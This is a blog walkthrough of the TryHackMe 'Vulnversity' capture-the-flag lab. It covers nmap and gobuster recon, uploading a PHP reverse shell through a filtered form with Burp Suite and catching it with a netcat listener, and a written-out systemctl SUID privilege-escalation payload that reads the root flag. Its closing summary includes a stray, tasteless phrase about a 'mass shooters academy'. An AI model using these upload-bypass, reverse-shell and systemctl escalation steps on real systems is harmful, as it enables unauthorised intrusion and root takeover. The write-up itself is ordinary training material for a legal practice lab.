Tryhackme - Vulnversity

Tryhackme – Vulnversity

In this walk through, we will be going through the Vulnversity room from Tryhackme. This room is rated as Easy on the platform and is developed to test our active recon, web app attacks and privilege escalation skills. So, let’s get started without any delay.


Machine Info:

ObjectiveLearn about active recon, web app attacks and privilege escalation.

Task 1Deploy the machine

Task 1 - Deploy the machine

Task 2 – Reconnaissance

Question 1 – There are many nmap “cheatsheets” online that you can use too.


Question 2 – Scan the box, how many ports are open?

nmap scan


Question 3 – What version of the squid proxy is running on the machine?

nmap output


Question 4 – How many ports will nmap scan if the flag -p-400 was used?


Question 5 – Using the nmap flag -n what will it not resolve?


Question 6 – What is the most likely operating system this machine is running?


Question 7 – What port is the web server running on?

HTTP version


Question 8 – Its important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)


Task 3 – Locating directories using GoBuster

Question 1 – Run Gobuster

gobuster dir -u -w ~/Desktop/common.txt


Question 2 – What is the directory that has an upload form page?

gobuster scan

internal directory

Upload functionality


Task 4 – Compromise the webserver

Question 1 – What common file type, which you’d want to upload to exploit the server, is blocked? Try a couple to find out.


Extension not allowed

cat phpext.txt

Burpsuite intercept

Payload Positions

Payload Options - Simple list


Question 3 – Run this attack, what extension is allowed?

We are going to use a PHP reverse shell as our payload. A reverse shell works by being called on the remote host and forcing this host to make a connection to you. So you’ll listen for incoming connections, upload and have your shell executed which will beacon out to you to control!

  • edit the IP in the pentest monkey reverse shell.
  • change the extenstion to “.phtml”.
  • upload the shell to the web server.
  • setup a netcat listener -> nc -lvnp 1234
  • execute the shell by visiting to the following URL ->


netcat listener


Question 4 – What is the name of the user who manages the webserver?

cat /etc/passwd


Question 5 – What is the user flag?



Task 5 – Privilege Escalation

Question 1 – On the system, search for all SUID files. What file stands out?

find / -user root -perm -4000 -exec ls -ldb {} \;

find command output


Question 2 – Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer? Become root and get the last flag (/root/root.txt)

echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]' > $TF
systemctl link $TF
systemctl enable $TF


priv esc exploit

systemctl start tmp.J18wiFxTNV.service


root flag


Also Read: Tryhackme – Vulnerabilities 101



So that was “Vulnversity” for you. Let’s sum it up quickly. We started off with a regular nmap scan with version detection, found many ports opened. Out of which, we further enumerated by directory bruteforcing it with gobuster. As a result, found an internal directory with file upload functionality. Bypassing the extension filtering on uploads with the help of the Burpsuite and got our initial access by catching a reverse shell at our netcat listener. At last, escalated our privileges by abusing the misconfigured systemctl binary with the help of GTFObins and got our root flag and an entry in the mass shooters academy. On that note, i will take your leave and will see you in next one, Till then “Hack the Planet”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top